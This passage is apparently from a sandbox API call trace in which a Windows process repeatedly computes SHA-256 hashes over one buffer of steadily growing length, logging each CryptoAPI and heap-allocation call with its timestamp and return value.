0x32e56dd0 [0147.024] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.024] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.024] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.025] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.025] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x600, dwFlags=0x0) returned 1 [0147.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56830 [0147.025] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.025] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.025] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.025] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.025] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x620, dwFlags=0x0) returned 1 [0147.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56770 [0147.025] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.025] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.025] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.026] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.026] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x640, dwFlags=0x0) returned 1 [0147.026] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56c50 [0147.026] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.026] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.026] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.027] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.027] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x660, dwFlags=0x0) returned 1 [0147.027] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56560 [0147.027] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.027] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.027] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.027] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.027] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x680, dwFlags=0x0) returned 1 [0147.027] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e567a0 [0147.027] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.028] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.028] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.028] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.028] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0147.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56a70 [0147.028] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.028] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.028] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.029] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.029] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0147.029] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56590 [0147.029] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.029] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.029] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.029] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.029] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0147.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56740 [0147.030] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.030] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.030] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.030] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.030] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x700, dwFlags=0x0) returned 1 [0147.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e565c0 [0147.030] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.030] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.030] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.031] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.031] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x720, dwFlags=0x0) returned 1 [0147.031] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e564a0 [0147.031] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.031] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.031] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.031] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.031] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x740, dwFlags=0x0) returned 1 [0147.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56410 [0147.032] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.032] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.032] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.032] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.032] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0x760, dwFlags=0x0) returned 1 [0147.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e569b0 [0147.032] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.032] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.032] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.033] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.033] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x780, dwFlags=0x0) returned 1 [0147.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56b00 [0147.033] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0147.033] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.033] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.033] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.033] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0147.034] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56e30 [0147.034] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.034] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.034] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.034] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.034] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0147.034] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e568c0 [0147.034] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.034] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.034] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.035] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.035] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0147.035] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56800 [0147.035] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.035] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.035] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.035] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.035] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x800, dwFlags=0x0) returned 1 [0147.036] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56920 [0147.036] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.036] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.036] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.036] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.036] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x820, dwFlags=0x0) returned 1 [0147.036] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56c20 [0147.036] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.036] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.036] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.037] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.037] CryptHashData (hHash=0x332b7900, pbData=0x32e4a600, dwDataLen=0x840, dwFlags=0x0) returned 1 [0147.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56a40 [0147.037] CryptDestroyHash (hHash=0x332b7900) returned 1 [0147.037] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.037] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.038] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.038] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x860, dwFlags=0x0) returned 1 [0147.038] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e569e0 [0147.038] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.038] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.038] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.039] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.039] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x880, dwFlags=0x0) returned 1 [0147.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56e90 [0147.039] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0147.039] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.039] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.040] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.040] CryptHashData (hHash=0x332b79e0, pbData=0x32e4a600, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0147.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56650 [0147.040] CryptDestroyHash (hHash=0x332b79e0) returned 1 [0147.040] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.040] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.040] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.040] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0147.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56b30 [0147.041] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.041] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.041] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.041] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.041] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0147.041] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56a10 [0147.041] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.041] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.041] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.042] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.042] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x900, dwFlags=0x0) returned 1 [0147.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e566b0 [0147.042] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.042] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.042] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.042] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.042] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x920, dwFlags=0x0) returned 1 [0147.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56ce0 [0147.042] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.042] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.042] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.043] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.043] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x940, dwFlags=0x0) returned 1 [0147.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56bf0 [0147.043] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.043] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.043] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.044] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.044] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x960, dwFlags=0x0) returned 1 [0147.044] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e567d0 [0147.044] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.044] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.044] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.044] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.044] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x980, dwFlags=0x0) returned 1 [0147.044] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56aa0 [0147.044] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.044] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.044] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.045] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.045] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0147.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e566e0 [0147.045] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.045] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.045] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.046] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.046] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0147.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e564d0 [0147.046] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.046] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.046] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.046] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.046] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0147.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56b60 [0147.046] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.046] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.046] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.047] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.047] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0147.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56440 [0147.047] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.047] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.047] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.048] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.048] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0147.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56860 [0147.048] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.048] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.048] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.048] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.048] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0147.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56ec0 [0147.048] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.048] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.048] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.049] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.049] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0147.049] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e568f0 [0147.049] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.049] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.049] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.050] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.050] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0147.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56500 [0147.050] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.050] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.050] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.050] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.050] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0147.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e563b0 [0147.051] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0147.051] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.051] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.051] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.051] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0147.051] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56bc0 [0147.051] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.051] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.051] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.052] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.052] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0147.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56b90 [0147.052] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.052] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.052] CryptAcquireContextW 